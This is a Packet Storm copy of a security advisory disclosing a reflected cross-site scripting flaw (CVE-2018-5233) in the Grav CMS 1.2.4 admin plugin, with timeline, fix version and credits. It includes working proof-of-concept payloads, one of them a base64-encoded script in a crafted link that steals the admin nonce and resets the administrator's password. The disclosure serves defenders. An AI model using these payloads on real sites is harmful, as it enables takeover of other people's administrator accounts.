Twenty Year Anniversary

Grav CMS 1.2.4 Cross Site Scripting

Grav CMS 1.2.4 Cross Site Scripting
Posted Mar 16, 2018
Authored by Kevin Locati

Grav CMS version 1.2.4 suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2018-5233
MD5 | 763363157a262edfdc03a3a4795ee264

Grav CMS 1.2.4 Cross Site Scripting

Change Mirror Download
# [CVE-2018-5233] Grav CMS admin plugin Reflected Cross Site Scripting
(XSS) vulnerability

## Description

Grav CMS is a flat-file CMS using Markdown files for content management
([Official Website](https://getgrav.org/)).

It has been elected "Best Open Source CMS of 2016" by [CMS
critic](https://www.cmscritic.com/the-winner-of-best-open-source-cms-for-2016-is-grav/).

The application does not always filter user input correctly, thereby
allowing an attacker to inject arbitrary Web content in the response of
the server (reflected Cross Site Scripting).

**CVE ID**: CVE-2018-5233

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-79

**CVSS Base Score**: 7.4

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N


## Details

On lines 355 and 358 of `system/src/Grav/Common/Twig/Twig.php`,
unfiltered user input is passed in the `$error_msg` variable.

```
$output = $this->twig->render($template, $twig_vars);
} catch (\Twig_Error_Loader $e) {

.. snip ..

throw new \RuntimeException($error_msg, 400, $e);
}
} else {
throw new \RuntimeException($error_msg, 400, $e);
}
}
```

As a result, generating an exception by accessing
`/admin/tools/someunexistingpage` and manipulating the
`someunexistingpage` part of the URL allows to inject arbitrary Web
content into the server's response.

## Proof of Concept #1

Visiting the following page:

```
/admin/tools/a--%3E%3Cimg%20src=x%20onerror=alert(1)%3E
```

will cause the execution of the `alert(1)` JavaScript code in the
context of the visitor's browser.

## Proof of Concept #2

By tricking a logged-in admin into visiting a malicious link, any
unauthenticated user can elevate its privileges to site administration.

Here follows a Proof of Concept code which:

1. Grabs the `admin-nonce` of the logged-in admin
2. Prints that nonce
3. Uses it to change the current admin's password to `Password7`

```
<script
src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>

<script>
adminNonce = "";
$.get( "/admin/user/admin",
function( data ) {adminNonce = $("input[name=admin-nonce]",
data).val()}).done(
function(){
alert(window.adminNonce);
$.post( "/admin/user/admin", {
"task": "save",
"admin-nonce": adminNonce,
"data[password]": "Password7"},
function(data){document.write(data)})}
);
</script>
```

Here is the base64 encoded version of the payload, injected in the
malicious link:

```
http://example.site.com/admin/tools/a--%3E%3Cimg%20src=x%20onerror=document['write'](atob('PHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuMi4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0PjxzY3JpcHQ+YWRtaW5Ob25jZSA9ICIiOyQuZ2V0KCAiL2FkbWluL3VzZXIvYWRtaW4iLCBmdW5jdGlvbiggZGF0YSApIHthZG1pbk5vbmNlID0gJCgiaW5wdXRbbmFtZT1hZG1pbi1ub25jZV0iLCBkYXRhKS52YWwoKX0pLmRvbmUoZnVuY3Rpb24oKXthbGVydCh3aW5kb3cuYWRtaW5Ob25jZSk7JC5wb3N0KCAiL2FkbWluL3VzZXIvYWRtaW4iLCB7ICJ0YXNrIjogInNhdmUiLCAiYWRtaW4tbm9uY2UiOiBhZG1pbk5vbmNlLCJkYXRhW3Bhc3N3b3JkXSI6ICJQYXNzd29yZDcifSwgZnVuY3Rpb24oZGF0YSl7ZG9jdW1lbnQud3JpdGUoZGF0YSl9KX0pOzwvc2NyaXB0Pgo='))%3E
```

Now, after the attacker tricks a logged-in admin into clicking on this
link, the admin's password is changed to the attacker controlled value.
Thus, the attacker can log in with `Password7` and navigate inside the
administration interface.


## Timeline (dd/mm/yyyy)

* 01/07/2017 : Initial discovery
* 01/07/2017 : Contact with the editor (email address)
* 02/07/2017 : Editor acknowledges the report
* 02/07/2017 : Sending further details and PoC code to the editor
* 04/07/2017 : Editor fixes the vulnerability
* 15/03/2018 : Advisory publication

## Fixes

Upgrade to version 1.3.0 and above (currently 1.3.10)

## Affected versions

* Version 1.2.4 (last stable version as of 02/07/2017 - previous
versions are probably also vulnerable but not tested)

## Credits

* Kevin LOCATI <k.locati@sysdream.com>


--
SYSDREAM Labs <labs@sysdream.com>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    15 Files
  • 14
    Dec 14th
    14 Files
  • 15
    Dec 15th
    2 Files
  • 16
    Dec 16th
    3 Files
  • 17
    Dec 17th
    15 Files
  • 18
    Dec 18th
    15 Files
  • 19
    Dec 19th
    4 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close